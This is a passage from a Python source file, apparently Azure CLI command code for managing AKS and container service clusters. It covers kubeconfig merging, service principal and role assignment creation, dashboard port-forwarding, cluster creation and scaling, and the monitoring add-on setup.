CLIError('Error parsing {} ({})'.format(filename, str(ex))) def merge_kubernetes_configurations(existing_file, addition_file, replace): existing = load_kubernetes_configuration(existing_file) addition = load_kubernetes_configuration(addition_file) # rename the admin context so it doesn't overwrite the user context for ctx in addition.get('contexts', []): try: if ctx['context']['user'].startswith('clusterAdmin'): admin_name = ctx['name'] + '-admin' addition['current-context'] = ctx['name'] = admin_name break except (KeyError, TypeError): continue if addition is None: raise CLIError('failed to load additional configuration from {}'.format(addition_file)) if existing is None: existing = addition else: _handle_merge(existing, addition, 'clusters', replace) _handle_merge(existing, addition, 'users', replace) _handle_merge(existing, addition, 'contexts', replace) existing['current-context'] = addition['current-context'] # check that ~/.kube/config is only read- and writable by its owner if platform.system() != 'Windows': existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode)) if not existing_file_perms.endswith('600'): logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.', existing_file, existing_file_perms) with open(existing_file, 'w+') as stream: yaml.safe_dump(existing, stream, default_flow_style=False) current_context = addition.get('current-context', 'UNKNOWN') msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file) print(msg) def _get_host_name(acs_info): """ Gets the FQDN from the acs_info object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info is None: raise CLIError('Missing acs_info') if acs_info.master_profile is None: raise CLIError('Missing master_profile') if acs_info.master_profile.fqdn is None: raise CLIError('Missing fqdn') return acs_info.master_profile.fqdn def _get_username(acs_info): """ Gets the admin user name from the Linux profile of the ContainerService object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info.linux_profile is not None: return acs_info.linux_profile.admin_username return None def _get_acs_info(cli_ctx, name, resource_group_name): """ Gets the ContainerService object from Azure REST API. :param name: ACS resource name :type name: String :param resource_group_name: Resource group name :type resource_group_name: String """ container_services = cf_container_services(cli_ctx, None) return container_services.get(resource_group_name, name) def _rand_str(n): """ Gets a random string """ choices = string.ascii_lowercase + string.digits return ''.join(random.SystemRandom().choice(choices) for _ in range(n)) def _mkdir_p(path): # http://stackoverflow.com/a/600612 try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count): instance = client.get(resource_group_name, container_service_name) instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member # null out the service principal because otherwise validation complains if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes: instance.service_principal_profile = None # null out the windows profile so that validation doesn't complain about not having the admin password instance.windows_profile = None return client.create_or_update(resource_group_name, container_service_name, instance) def list_container_services(cmd, client, resource_group_name=None): ''' List Container Services. ''' svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \ if resource_group_name else client.list() return list(svc_list) def show_service_principal(client, identifier): object_id = _resolve_service_principal(client, identifier) return client.get(object_id) def _resolve_service_principal(client, identifier): # todo: confirm with graph team that a service principal name must be unique result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier))) if result: return result[0].object_id try: uuid.UUID(identifier) return identifier # assume an object id except ValueError: raise CLIError("service principal '{}' doesn't exist".format(identifier)) def create_application(client, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants, display_name=display_name, identifier_uris=identifier_uris, homepage=homepage, reply_urls=reply_urls, key_credentials=key_creds, password_credentials=password_creds, required_resource_access=required_resource_accesses) try: return client.create(app_create_param) except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. Original error: {}".format(link, ex)) raise def update_application(client, object_id, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) try: if key_creds: client.update_key_credentials(object_id, key_creds) if password_creds: client.update_password_credentials(object_id, password_creds) if reply_urls: client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls)) return except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. Original error: {}".format(link, ex)) raise def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): if password and key_value: raise CLIError('specify either --password or --key-value, but not both.') if not start_date: start_date = datetime.datetime.utcnow() elif isinstance(start_date, str): start_date = dateutil.parser.parse(start_date) if not end_date: end_date = start_date + relativedelta(years=1) elif isinstance(end_date, str): end_date = dateutil.parser.parse(end_date) key_type = key_type or 'AsymmetricX509Cert' key_usage = key_usage or 'Verify' password_creds = None key_creds = None if password: password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(uuid.uuid4()), value=password)] elif key_value: key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value, key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)] return (password_creds, key_creds) def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None): if rbac_client is None: rbac_client = get_graph_rbac_management_client(cli_ctx) if resolve_app: try: uuid.UUID(identifier) result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier))) except ValueError: result = list(rbac_client.applications.list( filter="identifierUris/any(s:s eq '{}')".format(identifier))) if not result: # assume we get an object id result = [rbac_client.applications.get(identifier)] app_id = result[0].app_id else: app_id = identifier return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True)) def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None): return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope) def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True): from azure.cli.core.profiles import ResourceType, get_sdk factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments definitions_client = factory.role_definitions scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id) role_id = _resolve_role_id(role, scope, definitions_client) object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION, 'RoleAssignmentCreateParameters', mod='models', operation_group='role_assignments') parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id) assignment_name = uuid.uuid4() custom_headers = None return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers) def _build_role_scope(resource_group_name, scope, subscription_id): subscription_scope = '/subscriptions/' + subscription_id if scope: if resource_group_name: err = 'Resource group "{}" is redundant because scope is supplied' raise CLIError(err.format(resource_group_name)) elif resource_group_name: scope = subscription_scope + '/resourceGroups/' + resource_group_name else: scope = subscription_scope return scope def _resolve_role_id(role, scope, definitions_client): role_id = None try: uuid.UUID(role) role_id = role except ValueError: pass if not role_id: # retrieve role id role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role))) if not role_defs: raise CLIError("Role '{}' doesn't exist.".format(role)) elif len(role_defs) > 1: ids = [r.id for r in role_defs] err = "More than one role matches the given name '{}'. Please pick a value from '{}'" raise CLIError(err.format(role, ids)) role_id = role_defs[0].id return role_id def _resolve_object_id(cli_ctx, assignee): client = get_graph_rbac_management_client(cli_ctx) result = None if assignee.find('@') >= 0: # looks like a user principal name result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee))) if not result: result = list(client.service_principals.list( filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee))) if not result: # assume an object id, let us verify it result = _get_object_stubs(client, [assignee]) # 2+ matches should never happen, so we only check 'no match' here if not result: raise CLIError("No matches in graph database for '{}'".format(assignee)) return result[0].object_id def _get_object_stubs(graph_client, assignees): params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees) return list(graph_client.objects.get_objects_by_object_ids(params)) def _update_dict(dict1, dict2): cp = dict1.copy() cp.update(dict2) return cp def subnet_role_assignment_exists(cli_ctx, scope): network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7" factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'): if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id): return True return False def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_address='127.0.0.1', listen_port='8001'): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port) _, browse_path = tempfile.mkstemp() # TODO: need to add an --admin option? aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # find the dashboard pod's name try: dashboard_pod = subprocess.check_output( ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not find dashboard pod: {}'.format(err)) if dashboard_pod: # remove any "pods/" or "pod/" prefix from the name dashboard_pod = str(dashboard_pod).split('/')[-1].strip() else: raise CLIError("Couldn't find the Kubernetes dashboard pod.") # launch kubectl port-forward locally to access the remote dashboard if in_cloud_console(): # TODO: better error handling here. response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port)) result = json.loads(response.text) term_id = os.environ.get('ACC_TERM_ID') if term_id: response = requests.post('http://localhost:8888/openLink/{}'.format(term_id), json={"url": result['url']}) logger.warning('To view the console, please open %s in a new tab', result['url']) else: logger.warning('Proxy running on %s', proxy_url) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async(proxy_url) try: try: subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system", "port-forward", "--address", listen_address, dashboard_pod, "{0}:9090".format(listen_port)], stderr=subprocess.STDOUT) except subprocess.CalledProcessError as err: if err.output.find(b'unknown flag: --address'): if listen_address != '127.0.0.1': logger.warning('"--address" is only supported in kubectl v1.13 and later.') logger.warning('The "--listen-address" argument will be ignored.') subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system", "port-forward", dashboard_pod, "{0}:9090".format(listen_port)]) except KeyboardInterrupt: # Let command processing finish gracefully after the user presses [Ctrl+C] pass finally: # TODO: Better error handling here. requests.post('http://localhost:8888/closeport/8001') def _trim_nodepoolname(nodepool_name): if not nodepool_name: return "nodepool1" return nodepool_name[:12] def _validate_ssh_key(no_ssh_key, ssh_key_value): if not no_ssh_key: try: if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value): raise ValueError() except (TypeError, ValueError): shortened_key = truncate_text(ssh_key_value) raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key)) # pylint: disable=too-many-statements def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals dns_name_prefix=None, location=None, admin_username="azureuser", kubernetes_version='', node_vm_size="Standard_DS2_v2", node_osdisk_size=0, node_count=3, nodepool_name="nodepool1", service_principal=None, client_secret=None, no_ssh_key=False, disable_rbac=None, enable_rbac=None, skip_subnet_role_assignment=False, network_plugin=None, network_policy=None, pod_cidr=None, service_cidr=None, dns_service_ip=None, docker_bridge_address=None, enable_addons=None, workspace_resource_id=None, vnet_subnet_id=None, max_pods=0, aad_client_app_id=None, aad_server_app_id=None, aad_server_app_secret=None, aad_tenant_id=None, tags=None, generate_ssh_keys=False, # pylint: disable=unused-argument no_wait=False): _validate_ssh_key(no_ssh_key, ssh_key_value) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location agent_pool_profile = ManagedClusterAgentPoolProfile( name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it count=int(node_count), vm_size=node_vm_size, os_type="Linux", storage_profile=ContainerServiceStorageProfileTypes.managed_disks, vnet_subnet_id=vnet_subnet_id, max_pods=int(max_pods) if max_pods else None ) if node_osdisk_size: agent_pool_profile.os_disk_size_gb = int(node_osdisk_size) linux_profile = None # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified. if not no_ssh_key: ssh_config = ContainerServiceSshConfiguration( public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)]) linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config) principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal=service_principal, client_secret=client_secret, subscription_id=subscription_id, dns_name_prefix=dns_name_prefix, location=location, name=name) service_principal_profile = ContainerServiceServicePrincipalProfile( client_id=principal_obj.get("service_principal"), secret=principal_obj.get("client_secret"), key_vault_secret_ref=None) if (vnet_subnet_id and not skip_subnet_role_assignment and not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)): scope = vnet_subnet_id if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor', service_principal_profile.client_id, scope=scope): logger.warning('Could not create a role assignment for subnet. ' 'Are you an Owner on this subscription?') network_profile = None if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]): if not network_plugin: raise CLIError('Please explicitly specify the network plugin type') if pod_cidr and network_plugin == "azure": raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified') network_profile = ContainerServiceNetworkProfile( network_plugin=network_plugin, pod_cidr=pod_cidr, service_cidr=service_cidr, dns_service_ip=dns_service_ip, docker_bridge_cidr=docker_bridge_address, network_policy=network_policy ) addon_profiles = _handle_addons_args( cmd, enable_addons, subscription_id, resource_group_name, {}, workspace_resource_id ) monitoring = False if 'omsagent' in addon_profiles: monitoring = True _ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent']) aad_profile = None if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]): if aad_tenant_id is None: profile = Profile(cli_ctx=cmd.cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() aad_profile = ManagedClusterAADProfile( client_app_id=aad_client_app_id, server_app_id=aad_server_app_id, server_app_secret=aad_server_app_secret, tenant_id=aad_tenant_id ) # Check that both --disable-rbac and --enable-rbac weren't provided if all([disable_rbac, enable_rbac]): raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.') mc = ManagedCluster( location=location, tags=tags, dns_prefix=dns_name_prefix, kubernetes_version=kubernetes_version, enable_rbac=False if disable_rbac else True, agent_pool_profiles=[agent_pool_profile], linux_profile=linux_profile, service_principal_profile=service_principal_profile, network_profile=network_profile, addon_profiles=addon_profiles, aad_profile=aad_profile) # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=mc) # add cluster spn with Monitoring Metrics Publisher role assignment to the cluster resource # mdm metrics supported only in azure public cloud so add the role assignment only in this cloud cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurecloud' and monitoring: from msrestazure.tools import resource_id cluster_resource_id = resource_id( subscription=subscription_id, resource_group=resource_group_name, namespace='Microsoft.ContainerService', type='managedClusters', name=name ) if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher', service_principal_profile.client_id, scope=cluster_resource_id): logger.warning('Could not create a role assignment for monitoring addon. ' 'Are you an Owner on this subscription?') return result except CloudError as ex: retry_exception = ex if 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) instance = _update_addons( cmd, instance, subscription_id, resource_group_name, addons, enable=False, no_wait=no_wait ) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, subnet_name=None, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) service_principal_client_id = instance.service_principal_profile.client_id instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True, workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait) if 'omsagent' in instance.addon_profiles: _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent']) cloud_name = cmd.cli_ctx.cloud.name # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud if cloud_name.lower() == 'azurecloud': from msrestazure.tools import resource_id cluster_resource_id = resource_id( subscription=subscription_id, resource_group=resource_group_name, namespace='Microsoft.ContainerService', type='managedClusters', name=name ) if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher', service_principal_client_id, scope=cluster_resource_id): logger.warning('Could not create a role assignment for Monitoring addon. ' 'Are you an Owner on this subscription?') # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_get_versions(cmd, client, location): return client.list_orchestrators(location, resource_type='managedClusters') def aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), overwrite_existing=False): credentialResults = None if admin: credentialResults = client.list_cluster_admin_credentials(resource_group_name, name) else: credentialResults = client.list_cluster_user_credentials(resource_group_name, name) if not credentialResults: raise CLIError("No Kubernetes credentials found.") else: try: kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8') _print_or_merge_credentials(path, kubeconfig, overwrite_existing) except (IndexError, ValueError): raise CLIError("Fail to find kubeconfig file.") ADDONS = { 'http_application_routing': 'httpApplicationRouting', 'monitoring': 'omsagent', 'virtual-node': 'aciConnector' } def aks_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_nulls(list(managed_clusters)) def aks_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_nulls([mc])[0] def aks_update_credentials(cmd, client, resource_group_name, name, reset_service_principal=False, reset_aad=False, service_principal=None, client_secret=None, aad_server_app_id=None, aad_server_app_secret=None, aad_client_app_id=None, aad_tenant_id=None, no_wait=False): if bool(reset_service_principal) == bool(reset_aad): raise CLIError('usage error: --reset-service-principal | --reset-aad-profile') if reset_service_principal: if service_principal is None or client_secret is None: raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET') return sdk_no_wait(no_wait, client.reset_service_principal_profile, resource_group_name, name, service_principal, client_secret) if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]): raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID ' '--aad-server-app-secret SECRET [--aad-tenant-id ID]') parameters = { 'clientAppID': aad_client_app_id, 'serverAppID': aad_server_app_id, 'serverAppSecret': aad_server_app_secret, 'tenantID': aad_tenant_id } return sdk_no_wait(no_wait, client.reset_aad_profile, resource_group_name, name, parameters) def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False): instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. for agent_profile in instance.agent_pool_profiles: if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1): agent_profile.count = int(node_count) # pylint: disable=no-member # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name)) def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument instance = client.get(resource_group_name, name) if instance.kubernetes_version == kubernetes_version: if instance.provisioning_state == "Succeeded": logger.warning("The cluster is already on version %s and is not in a failed state. No operations " "will occur when upgrading to the same version if the cluster is not in a failed state.", instance.kubernetes_version) elif instance.provisioning_state == "Failed": logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to " "attempt resolution of failed cluster state.", instance.kubernetes_version) instance.kubernetes_version = kubernetes_version # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) DEV_SPACES_EXTENSION_NAME = 'dev-spaces' DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom' def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False): """ Use Azure Dev Spaces with a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param update: Update to the latest Azure Dev Spaces client components. :type update: bool :param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience. :type space_name: String :param prompt: Do not prompt for confirmation. Requires --space. :type prompt: bool """ if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt) except TypeError: raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.") except AttributeError as ae: raise CLIError(ae) def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False): """ Remove Azure Dev Spaces from a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param prompt: Do not prompt for confirmation. :type prompt: bool """ if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt) except AttributeError as ae: raise CLIError(ae) def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None, subnet_name=None, no_wait=False): # parse the comma-separated addons argument addon_args = addons.split(',') addon_profiles = instance.addon_profiles or {} os_type = 'Linux' # for each addons argument for addon_arg in addon_args: addon = ADDONS[addon_arg] if addon == 'aciConnector': # only linux is supported for now, in the future this will be a user flag addon += os_type # addon name is case insensitive addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon) if enable: # add new addons or update existing ones and enable them addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False)) # special config handling for certain addons if addon == 'omsagent': if addon_profile.enabled: raise CLIError('The monitoring addon is already enabled for this managed cluster.\n' 'To change monitoring configuration, run "az aks disable-addons -a monitoring"' 'before enabling it again.') if not workspace_resource_id: workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id} elif addon.lower() == ('aciConnector' + os_type).lower(): if addon_profile.enabled: raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n' 'To change virtual-node configuration, run ' '"az aks disable-addons -a virtual-node -g {resource_group_name}" ' 'before enabling it again.') if not subnet_name: raise CLIError('The aci-connector addon requires setting a subnet name.') addon_profile.config = {'SubnetName': subnet_name} addon_profiles[addon] = addon_profile else: if addon not in addon_profiles: raise CLIError("The addon {} is not installed.".format(addon)) addon_profiles[addon].config = None addon_profiles[addon].enabled = enable instance.addon_profiles = addon_profiles # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return instance def _get_azext_module(extension_name, module_name): try: # Adding the installed extension in the path from azure.cli.core.extension.operations import add_extension_to_path add_extension_to_path(extension_name) # Import the extension module from importlib import import_module azext_custom = import_module(module_name) return azext_custom except ImportError as ie: raise CLIError(ie) def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None, workspace_resource_id=None): if not addon_profiles: addon_profiles = {} addons = addons_str.split(',') if addons_str else [] if 'http_application_routing' in addons: addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True) addons.remove('http_application_routing') # TODO: can we help the user find a workspace resource ID? if 'monitoring' in addons: if not workspace_resource_id: # use default workspace if exists else create default workspace workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profiles['omsagent'] = ManagedClusterAddonProfile( enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id}) addons.remove('monitoring') # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is elif workspace_resource_id: raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".') # error out if any (unrecognized) addons remain if addons: raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format( ",".join(addons), "are" if len(addons) > 1 else "is")) return addon_profiles def _install_dev_spaces_extension(cmd, extension_name): try: from azure.cli.core.extension import operations operations.add_extension(cmd=cmd, extension_name=extension_name) except Exception: # nopa pylint: disable=broad-except return False return True def _update_dev_spaces_extension(cmd, extension_name, extension_module): from azure.cli.core.extension import ExtensionNotInstalledException try: from azure.cli.core.extension import operations operations.update_extension(cmd=cmd, extension_name=extension_name) operations.reload_extension(extension_name=extension_name) except CLIError as err: logger.info(err) except ExtensionNotInstalledException as err: logger.debug(err) return False except ModuleNotFoundError as err: logger.debug(err) logger.error("Error occurred attempting to load the extension module. Use --debug for more information.") return False return True def _get_or_add_extension(cmd, extension_name, extension_module, update=False): from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension) try: get_extension(extension_name) if update: return _update_dev_spaces_extension(cmd, extension_name, extension_module) except ExtensionNotInstalledException: return _install_dev_spaces_extension(cmd, extension_name) return True def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name): # mapping for azure public cloud # log analytics workspaces cannot be created in WCUS region due to capacity limits # so mapped to EUS per discussion with log analytics team AzureCloudLocationToOmsRegionCodeMap = { "eastus": "EUS", "westeurope": "WEU", "southeastasia": "SEA", "australiasoutheast": "ASE", "usgovvirginia": "USGV", "westcentralus": "EUS", "japaneast": "EJP", "uksouth": "SUK", "canadacentral": "CCA", "centralindia": "CIN", "eastus2euap": "EAP" } AzureCloudRegionToOmsRegionMap = { "australiaeast": "australiasoutheast", "australiasoutheast": "australiasoutheast", "brazilsouth": "eastus", "canadacentral": "canadacentral", "canadaeast": "canadacentral", "centralus": "eastus", "eastasia": "southeastasia", "eastus": "eastus", "eastus2": "eastus", "japaneast": "japaneast", "japanwest": "japaneast", "northcentralus": "eastus", "northeurope": "westeurope", "southcentralus": "eastus", "southeastasia": "southeastasia", "uksouth": "uksouth", "ukwest": "uksouth", "westcentralus": "eastus", "westeurope": "westeurope", "westus": "eastus", "westus2": "eastus", "centralindia": "centralindia", "southindia": "centralindia", "westindia": "centralindia", "koreacentral": "southeastasia", "koreasouth": "southeastasia", "francecentral": "westeurope", "francesouth": "westeurope" } # mapping for azure china cloud # currently log analytics supported only China East 2 region AzureChinaLocationToOmsRegionCodeMap = { "chinaeast": "EAST2", "chinaeast2": "EAST2", "chinanorth": "EAST2", "chinanorth2": "EAST2" } AzureChinaRegionToOmsRegionMap = { "chinaeast": "chinaeast2", "chinaeast2": "chinaeast2", "chinanorth": "chinaeast2", "chinanorth2": "chinaeast2" } rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) default_region_name = "eastus" default_region_code = "EUS" workspace_region = default_region_name workspace_region_code = default_region_code cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurecloud': workspace_region = AzureCloudRegionToOmsRegionMap[ rg_location] if AzureCloudRegionToOmsRegionMap[rg_location] else default_region_name workspace_region_code = AzureCloudLocationToOmsRegionCodeMap[ workspace_region] if AzureCloudLocationToOmsRegionCodeMap[workspace_region] else default_region_code elif cloud_name.lower() == 'azurechinacloud': default_region_name = "chinaeast2" default_region_code = "EAST2" workspace_region = AzureChinaRegionToOmsRegionMap[ rg_location] if AzureChinaRegionToOmsRegionMap[rg_location] else default_region_name workspace_region_code = AzureChinaLocationToOmsRegionCodeMap[ workspace_region] if AzureChinaLocationToOmsRegionCodeMap[workspace_region] else default_region_code else: logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name) default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code) default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \ '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name) resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id) resources = cf_resources(cmd.cli_ctx, subscription_id) # check if default RG exists if resource_groups.check_existence(default_workspace_resource_group): try: resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview') return resource.id except CloudError as ex: if ex.status_code != 404: raise ex else: 